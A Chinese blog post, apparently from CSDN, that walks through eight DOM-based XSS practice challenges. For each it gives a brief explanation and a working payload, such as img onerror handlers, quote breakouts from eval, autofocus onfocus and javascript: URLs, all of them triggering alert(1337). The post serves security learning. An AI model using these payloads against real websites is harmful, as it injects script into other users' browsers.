xssDOM型练习

最新推荐文章于 2024-08-19 18:08:02 发布
最新推荐文章于 2024-08-19 18:08:02 发布
阅读量129 收藏 3
点赞数 6
文章标签: php nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69656902/article/details/141286962
版权

文章目录

例1

在这里插入图片描述
本题通过get接收并传递参数,所有参数不经过过滤直接放入h2标签里面。

要求

1.需要页面弹出1337
2.不能与用户交互

官方认为innerHTML中script标签不安全,所以将其禁用,但只禁用了此标签,所以我们可以使用其它标签来进行弹窗。

这里我们可以直接使用img标签。
在这里插入图片描述

<img src = 1 onerror ="alert=1337">

例2

在这里插入图片描述

代码解析

在这里插入图片描述
1.当给jeff传值时显示所传值,无值时显示JEFFF
2.eval中将Ma name $(jeff)赋值给ma
3.将ma放入h2标签下
setTimeout 1000 表示在一秒后执行一次。

方法

由于maname使用了innerText属性,所以传递到maname的内容均为文本,无法执行代码,因此我们就可以将eval中的代码闭合来执行我们的恶意代码。

?jeff=1";alert(1337);"

在这里插入图片描述

例3

在这里插入图片描述

?wey=aaa"onfocus = alert(1337) autofocus="

在这里插入图片描述

例4

在这里插入图片描述

?ricardo=javascript:alert(1337)

在这里插入图片描述

例5

在这里插入图片描述

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

在这里插入图片描述

例6

在这里插入图片描述
在这里插入图片描述

例7

在这里插入图片描述

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

在这里插入图片描述

例8

在这里插入图片描述

?boomer=<a%20id=ok%20href="tel:alert(1337)">

在这里插入图片描述

止痛曜
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS(DOM)
kid的博客
05-05 4172
XSS(DOM) 前言 讲道理,现在我对XSS(DOM)的原理还是很迷啊,不看下js和前端的知识感觉还是很迷,不是很懂。 但是我觉得练习还是可以做的,因为看过一些大佬的文章后,感觉有成为脚本小子的能力了… XSS的原理分析与解剖(第二篇) 这篇文章前面xss反射的时候就引用过,里面有一段介绍xss dom的,我感觉原理说的也不是很清楚,但看了它的例子后大概知道怎么去搞了… 练习 Low 这里G...
利用DOM XSS
2301_78833225的博客
06-21 227
利用DOM XSS攻击时,payload 是由浏览器的 DOM 接收和处理的,这意味着注入的代码永远不会在服务器端运行,并且任何服务器端验证或编码都对这种攻击无效。浏览器登入靶机IP,转到 Mutillidae II | OWASP 2013 | XSS | DOM | HTML5 Storage。(2)尝试添加一些数据,发现在开发者工具中并没有进行网络通信,绿色条显示。(1)这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的。(5)尝试设置一个包含 HTML 代码的键值。
反射XSS靶场练习
qq_58000413的博客
09-25 1073
DVWA靶场第一关:low 直接一条alert(1)看看结果,很简单直接过关 第二关:Medium 继续接着一条alert(1)看结果,没有弹窗,接着我们看下源码 看到前端源码后,发现好像给过滤了,这时候我们需要考虑下为什么过滤 这时我们可以尝试下是不是因为这个组合导致的,不出意外应该是的 这时候我们可以尝试没有的payload,或者将通过大小写绕过alert(
DOMXSS讲解及演示
liguangyao213的博客
12-22 905
这里实验使用的是:pikachu靶场:area39/pikachu 可以直接使用 docker pull area39/pikachu 下载容器,并启动,也可以使用小编的靶场练习,小编靶场地址:​​http://150.158.23.229:8000/​​ 原理:用户请求一个包含JavaScript的特殊URL,会由攻击者提交。然后服务器响应里不会包含攻击者的脚本,当用户的浏览器处理该响应时,这段攻击代码被前端JS里的DOM处理操作引发。基于DOMXSS是不需要与服务器交互的,只发生在客...
DOMXSS以及DVWA平台的DOMXSS练习
sweetie 的博客
10-27 448
DOMxss的实现过程都是在前台 介绍两种场景的DOMxss 两种场景都适用的POC #' οnclick="alert(111)"> 或者这个POC #"><img src=1 οnerrοr=alert(1)> ** DVWA平台的DOMXSS练习 ** 1. Low low级别的代码没有任何的保护性措施 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 <script>alert('sweetie')</script&gt
XSS注入——DOMXSS
wwwwyyyrre的博客
06-26 4820
XSS根据恶意脚本的传递方式可以分为3种,分别为反射、存储DOM,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM来说比较好检测与防御,而DOM不用将恶意脚本传输到服务器在返回客户端,这就是DOM和反射、存储的区别DOMxss可以在前端通过js渲染来完成数据的交互,达到插入数据造成xss脚本攻击,且不经过服务器,所以即使抓包无无法抓取到这里的流量。它是基于DoM文档对象的一种漏洞,并且DOMXSS是基于JS上的,并不需要与服务器进行交互。
XSS注入进阶练习篇(二)DOMXSS注入深入
好好睡觉
02-19 2830
DOMXSS,SVG绕过WAF、DOM 破坏
XSSDOM注入技巧
m0_63692368的博客
08-17 797
XSSDOM注入技巧
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 2723
pikachu靶场 XSS详解
XSS20关练习源码
09-04
2. **存储XSS**:与反射XSS不同,这种攻击将恶意脚本存储在服务器上,然后在多个用户访问同一内容时执行。例如,`level5.php`可能是一个用户留言系统,攻击者可以通过提交包含恶意脚本的评论来实现攻击。 3. **...
XSS练习平台
07-17
XSS分为三种类:反射XSS、存储XSSDOMXSS。反射XSS通常发生在用户点击含有恶意代码的链接时,这些代码会立即执行并在同一页面显示结果。存储XSS更为严重,因为它将恶意脚本永久地存储在服务器上,然后...
xss平台搭建源码,xss漏洞练习
06-03
XSS分为反射XSS、存储XSSDOMXSS三种类。反射XSS是通过诱使用户点击含有恶意脚本的链接来触发;存储XSS则是恶意脚本被存储在服务器端,然后在用户查看页面时执行;DOMXSS则是在客户端通过修改DOM对象...
xss_test.7z
03-12
3. **DOMXSS**:与前两者不同,DOMXSS不依赖服务器,而是利用了浏览器的JavaScript DOM(文档对象模)来执行恶意脚本。攻击者可以通过修改页面的DOM结构,注入并执行有害代码。 接下来,探讨XSS攻击的危害: ...
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
XSS攻击主要分为反射、存储DOM三种类。反射XSS发生在用户点击链接或者提交表单时,恶意脚本被嵌入到动态生成的页面中并立即执行。存储XSS则更为严重,因为它将恶意脚本存储在服务器上,任何访问该页面...
Java、python、php版的高考志愿填报辅助系统(源码、调试、LW、开题、PPT)
最新发布
m0_72599287的博客
08-19 624
高考志愿填报辅助系统采用Java、python、php三种语言做了三个不同的版本,每个版本的页面央视、功能模块都一样,具体如文中展示。
多媒体技术及应用课程思政网站
m0_73706453的博客
08-15 648
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
wordpress网站“ERR_CONNECTION_REFUSED”错误
xiaoyuya
08-17 324
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高版本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
PHP多项目多场景排队叫号系统源码
2401_84414018的博客
08-16 511
多项目多场景排队叫号系统的出现,不仅极大地改善了顾客的等待体验,也提升了服务机构的工作效率和管理水平。它让等待不再是一种负担,而是一种高效有序的享受。未来,随着技术的不断进步和应用场景的不断拓展,相信多项目多场景排队叫号系统将会为更多行业带来便捷和高效。让我们一起期待更加美好的智能服务时代吧!🚀🌟。
哪那种类xss危害最大 存储xss 反射xss DOMxss 危害一样大
06-25
尽管反射XSSDOMXSS的危害相对较小,因为它们依赖于用户的直接行动,但存储XSS的危害最大,因为它具有长期性和自动性的特点,对网站用户构成更大的威胁。所以,防范存储XSS通常被视为网站安全的重要部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值